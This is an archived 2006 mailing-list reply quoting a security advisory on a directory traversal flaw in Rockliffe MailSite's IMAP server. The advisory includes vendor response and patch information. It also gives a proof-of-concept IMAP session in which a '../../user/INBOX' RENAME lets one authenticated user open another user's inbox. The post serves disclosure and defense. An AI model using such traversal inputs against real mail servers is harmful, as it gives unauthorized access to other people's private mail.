lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Wed, 4 Jan 2006 12:03:40 -0500
From: Stan Bubrouski <stan.bubrouski@...il.com>
To: Josh Zlatin <jzlatin@...at.cc>
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Re: Rockliffe Directory Transversal Vulnerability


Seeing as most IMAP servers allow you to use ../../ with SELECT, etc..
(think uw-imapd for example) I think I would categorize this as more
of a permissions problem.

-sb

On 1/4/06, Josh Zlatin <jzlatin@...at.cc> wrote:
> Synopsis: Rockliffe's Mailsite Imap Directory Transversal Vulnerability.
>
> Product: Rockliffe Mailsite
>          http://www.rockliffe.com
>
> Version: Confirmed on Mailsite < 6.1.22.1
>
> Author: Josh Zlatin-Amishav
>
> Date: January 4, 2006
>
> Background:
> Rockliffe MailSite secure email server software and MailSite MP secure email
> gateways provide email server solutions and gateway email protection for
> businesses and service providers. Rockliffe has more than 3,000 customers
> hosting more than 15 million mailboxes worldwide.
>
> Issue:
> In working with researchers at Tenable Network Security, I have come across
> a directory transversal flaw in the IMAP server. It is possible for an
> authenticated user to access any user's inbox via a RENAME command.
>
> PoC:
>
> josh@...1:~$ telnet 10.0.0.5 143
> Trying 10.0.0.5...
> Connected to 10.0.0.5.
> Escape character is '^]'.
> * OK  MailSite IMAP4 Server 6.1.22.0 ready
> a1 login joe pass
> a1 OK LOGIN completed
> a2 rename ../../josh/INBOX gotcha
> a2 OK RENAME folder ../../josh/INBOX renamed to gotcha
> a3 select gotcha
> * FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
> * 0 EXISTS
> * 0 RECENT
> * OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)]
> * OK [UNSEEN 0]
> * OK [UIDVALIDITY 514563061] UIDs are valid
> a3 OK [READ-WRITE] opened gotcha
>
> user joe can now access the contents of user josh's INBOX directory.
>
> Vendor notified: January 3, 2006 06:12AM
>
> Vendor Response:
> Contact your sales rep about purchasing Mailsite 7.0.3.1
>
> Solution:
> Mailsite fixed a buffer overun in the Mailsite IMAP server which also fixes
> the directory transversal problem. Either upgrade to version 6.1.22 and install
> the hotfix (i.e. upgrade to 6.1.22.1), or install the latest version of
> Mailsite. The hotfix can be obtained at:
>
> ftp://ftp.rockliffe.com/MailSite/6.1.22/Hotfixes/MailSiteServicePack.exe
>
> References: http://www.rockliffe.com
> References: http://zur.homelinux.com/Advisories/RockliffeMailsiteDirTransveral.txt
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ